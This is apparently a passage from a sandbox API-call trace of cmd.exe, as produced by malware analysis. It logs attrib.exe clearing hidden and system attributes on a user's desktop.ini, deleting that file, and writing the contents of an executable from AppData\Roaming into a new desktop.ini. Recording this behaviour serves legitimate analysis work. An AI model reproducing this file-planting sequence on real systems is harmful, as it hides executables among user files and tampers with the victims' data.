lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0142.112] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0142.112] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0142.112] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0142.112] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0142.112] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0142.112] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0142.112] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0142.112] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0142.112] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0142.112] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0142.112] GetEnvironmentStringsW () returned 0x312568* [0142.112] FreeEnvironmentStringsW (penv=0x312568) returned 1 [0142.112] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0142.112] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0142.112] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0142.112] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0142.112] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0142.112] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0142.112] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0142.112] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0142.112] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0142.112] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0142.112] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x20f5b0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0142.113] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x20f5b0, lpFilePart=0x20f5ac | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x20f5ac*="Desktop") returned 0x18 [0142.113] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0142.113] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x20f32c | out: lpFindFileData=0x20f32c) returned 0x310bf8 [0142.113] FindClose (in: hFindFile=0x310bf8 | out: hFindFile=0x310bf8) returned 1 [0142.113] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x20f32c | out: lpFindFileData=0x20f32c) returned 0x310bf8 [0142.113] FindClose (in: hFindFile=0x310bf8 | out: hFindFile=0x310bf8) returned 1 [0142.113] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x20f32c | out: lpFindFileData=0x20f32c) returned 0x310bf8 [0142.113] FindClose (in: hFindFile=0x310bf8 | out: hFindFile=0x310bf8) returned 1 [0142.113] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0142.113] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0142.113] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0142.114] GetEnvironmentStringsW () returned 0x310418* [0142.114] FreeEnvironmentStringsW (penv=0x310418) returned 1 [0142.114] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0142.114] GetConsoleOutputCP () returned 0x1b5 [0142.114] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0142.114] GetUserDefaultLCID () returned 0x409 [0142.115] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0142.115] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x20f6f0, cchData=128 | out: lpLCData="0") returned 2 [0142.115] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x20f6f0, cchData=128 | out: lpLCData="0") returned 2 [0142.115] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x20f6f0, cchData=128 | out: lpLCData="1") returned 2 [0142.115] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0142.115] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0142.115] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0142.115] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0142.115] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0142.115] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0142.115] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0142.115] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0142.115] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0142.115] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0142.116] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0142.116] GetConsoleTitleW (in: lpConsoleTitle=0x300a70, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0142.117] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0142.117] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0142.117] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0142.117] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0142.118] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0142.118] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0142.118] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0142.118] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0142.118] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0142.118] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0142.118] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0142.120] _wcsicmp (_String1="del", _String2=")") returned 59 [0142.120] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0142.120] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0142.120] _wcsicmp (_String1="IF", _String2="del") returned 5 [0142.120] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0142.120] _wcsicmp (_String1="REM", _String2="del") returned 14 [0142.120] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0142.122] _wcsicmp (_String1="type", _String2=")") returned 75 [0142.122] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0142.122] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0142.122] _wcsicmp (_String1="IF", _String2="type") returned -11 [0142.122] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0142.122] _wcsicmp (_String1="REM", _String2="type") returned -2 [0142.122] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0142.342] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0142.342] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0142.342] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0142.342] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0142.342] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0142.342] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0142.344] SetErrorMode (uMode=0x0) returned 0x0 [0142.344] SetErrorMode (uMode=0x1) returned 0x0 [0142.344] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x310420, lpFilePart=0x20eea4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x20eea4*="Desktop") returned 0x18 [0142.344] SetErrorMode (uMode=0x0) returned 0x1 [0142.344] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0142.344] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0142.348] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0142.349] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x20ec20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ec20) returned 0xffffffff [0142.666] GetLastError () returned 0x2 [0142.666] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x20ec20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ec20) returned 0xffffffff [0142.666] GetLastError () returned 0x2 [0142.666] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x20ec20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ec20) returned 0x3124e8 [0142.666] FindClose (in: hFindFile=0x3124e8 | out: hFindFile=0x3124e8) returned 1 [0142.666] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x20ec20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ec20) returned 0xffffffff [0142.666] GetLastError () returned 0x2 [0142.666] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x20ec20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ec20) returned 0x3124e8 [0142.667] FindClose (in: hFindFile=0x3124e8 | out: hFindFile=0x3124e8) returned 1 [0142.667] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0142.667] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0142.667] GetConsoleTitleW (in: lpConsoleTitle=0x20f118, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0142.667] InitializeProcThreadAttributeList (in: lpAttributeList=0x20efa0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x20f068 | out: lpAttributeList=0x20efa0, lpSize=0x20f068) returned 1 [0142.667] UpdateProcThreadAttribute (in: lpAttributeList=0x20efa0, dwFlags=0x0, Attribute=0x60001, lpValue=0x20f060, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x20efa0, lpPreviousValue=0x0) returned 1 [0142.667] GetStartupInfoW (in: lpStartupInfo=0x20ef5c | out: lpStartupInfo=0x20ef5c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0142.667] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0142.668] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h \"C:\\Users\\EEBsYm5\\Pictures\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x20effc*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\EEBsYm5\\Pictures\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x20f048 | out: lpCommandLine="attrib -r -s -h \"C:\\Users\\EEBsYm5\\Pictures\\desktop.ini\" ", lpProcessInformation=0x20f048*(hProcess=0x50, hThread=0x4c, dwProcessId=0x910, dwThreadId=0x8b4)) returned 1 [0142.671] CloseHandle (hObject=0x4c) returned 1 [0142.671] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0142.671] GetEnvironmentStringsW () returned 0x310838* [0142.671] FreeEnvironmentStringsW (penv=0x310838) returned 1 [0142.671] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0142.839] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x20ef3c | out: lpExitCode=0x20ef3c*=0x0) returned 1 [0142.839] CloseHandle (hObject=0x50) returned 1 [0142.839] _vsnwprintf (in: _Buffer=0x20f084, _BufferCount=0x13, _Format="%08X", _ArgList=0x20ef48 | out: _Buffer="00000000") returned 8 [0142.839] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0142.839] GetEnvironmentStringsW () returned 0x312558* [0142.840] FreeEnvironmentStringsW (penv=0x312558) returned 1 [0142.840] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0142.840] GetEnvironmentStringsW () returned 0x312558* [0142.840] FreeEnvironmentStringsW (penv=0x312558) returned 1 [0142.840] DeleteProcThreadAttributeList (in: lpAttributeList=0x20efa0 | out: lpAttributeList=0x20efa0) [0142.840] GetConsoleTitleW (in: lpConsoleTitle=0x20f320, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0142.840] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x20e398, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x20e39c, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x20e398*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0142.841] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0142.841] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0142.841] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0142.841] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\desktop.ini" (normalized: "c:\\users\\eebsym5\\pictures\\desktop.ini")) returned 0x20 [0142.841] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures" (normalized: "c:\\users\\eebsym5\\pictures")) returned 0x11 [0142.841] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0142.841] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0142.841] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\desktop.ini" (normalized: "c:\\users\\eebsym5\\pictures\\desktop.ini")) returned 0x20 [0142.841] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\desktop.ini", fInfoLevelId=0x0, lpFindFileData=0x3135e4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3135e4) returned 0x312c78 [0142.842] DeleteFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\desktop.ini" (normalized: "c:\\users\\eebsym5\\pictures\\desktop.ini")) returned 1 [0142.842] FindNextFileW (in: hFindFile=0x312c78, lpFindFileData=0x3135e4 | out: lpFindFileData=0x3135e4) returned 0 [0142.843] GetLastError () returned 0x12 [0142.843] FindClose (in: hFindFile=0x312c78 | out: hFindFile=0x312c78) returned 1 [0142.843] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.843] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.843] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.844] GetFileType (hFile=0x7) returned 0x2 [0142.844] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0142.844] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x20f4bc | out: lpMode=0x20f4bc) returned 1 [0142.844] _dup (_FileHandle=1) returned 3 [0142.844] _close (_FileHandle=1) returned 0 [0142.845] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\Pictures\\desktop.ini", _String2="con") returned -53 [0142.845] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\desktop.ini" (normalized: "c:\\users\\eebsym5\\pictures\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x20f48c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50 [0142.845] _open_osfhandle (_OSFileHandle=0x50, _Flags=8) returned 1 [0142.845] GetConsoleTitleW (in: lpConsoleTitle=0x20f2bc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0142.845] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe", fInfoLevelId=0x1, lpFindFileData=0x20ee20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ee20) returned 0x30e5e8 [0142.845] _wcsicmp (_String1="XEY8d7zI.exe", _String2=".") returned 74 [0142.845] _wcsicmp (_String1="XEY8d7zI.exe", _String2="..") returned 74 [0142.845] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0142.846] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x20dd2c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0142.846] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 4 [0142.846] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.846] GetFileType (hFile=0x58) returned 0x1 [0142.846] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.846] GetFileSize (in: hFile=0x58, lpFileSizeHigh=0x20dd84 | out: lpFileSizeHigh=0x20dd84*=0x0) returned 0x7d600 [0142.846] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.846] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.846] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.846] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.847] GetFileType (hFile=0x50) returned 0x1 [0142.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.847] GetFileType (hFile=0x50) returned 0x1 [0142.847] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.847] WriteFile (in: hFile=0x50, lpBuffer=0x20ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.849] GetFileType (hFile=0x50) returned 0x1 [0142.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.849] WriteFile (in: hFile=0x50, lpBuffer=0x20ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec0c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.849] GetFileType (hFile=0x50) returned 0x1 [0142.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.849] WriteFile (in: hFile=0x50, lpBuffer=0x20ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec5c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.849] GetFileType (hFile=0x50) returned 0x1 [0142.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.849] WriteFile (in: hFile=0x50, lpBuffer=0x20ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecac*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.849] GetFileType (hFile=0x50) returned 0x1 [0142.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.849] WriteFile (in: hFile=0x50, lpBuffer=0x20ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecfc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.849] GetFileType (hFile=0x50) returned 0x1 [0142.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.850] WriteFile (in: hFile=0x50, lpBuffer=0x20ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed4c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.850] GetFileType (hFile=0x50) returned 0x1 [0142.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.850] WriteFile (in: hFile=0x50, lpBuffer=0x20ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed9c*, lpNumberOfBytesWritten=0x20dda0*=0x20, lpOverlapped=0x0) returned 1 [0142.850] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.850] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dd8c | out: lpNewFilePointer=0x0) returned 1 [0142.850] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.850] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.850] GetFileType (hFile=0x50) returned 0x1 [0142.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.850] GetFileType (hFile=0x50) returned 0x1 [0142.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.850] WriteFile (in: hFile=0x50, lpBuffer=0x20ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.850] GetFileType (hFile=0x50) returned 0x1 [0142.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.850] WriteFile (in: hFile=0x50, lpBuffer=0x20ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec0c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.850] GetFileType (hFile=0x50) returned 0x1 [0142.850] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.851] WriteFile (in: hFile=0x50, lpBuffer=0x20ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec5c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.851] GetFileType (hFile=0x50) returned 0x1 [0142.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.851] WriteFile (in: hFile=0x50, lpBuffer=0x20ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecac*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.851] GetFileType (hFile=0x50) returned 0x1 [0142.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.851] WriteFile (in: hFile=0x50, lpBuffer=0x20ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecfc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.851] GetFileType (hFile=0x50) returned 0x1 [0142.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.851] WriteFile (in: hFile=0x50, lpBuffer=0x20ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed4c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.851] GetFileType (hFile=0x50) returned 0x1 [0142.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.851] WriteFile (in: hFile=0x50, lpBuffer=0x20ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed9c*, lpNumberOfBytesWritten=0x20dda0*=0x20, lpOverlapped=0x0) returned 1 [0142.851] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.851] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dd8c | out: lpNewFilePointer=0x0) returned 1 [0142.851] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.851] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.851] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.852] GetFileType (hFile=0x50) returned 0x1 [0142.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.852] GetFileType (hFile=0x50) returned 0x1 [0142.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.852] WriteFile (in: hFile=0x50, lpBuffer=0x20ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesWritten=0x20dda0*=0x50, 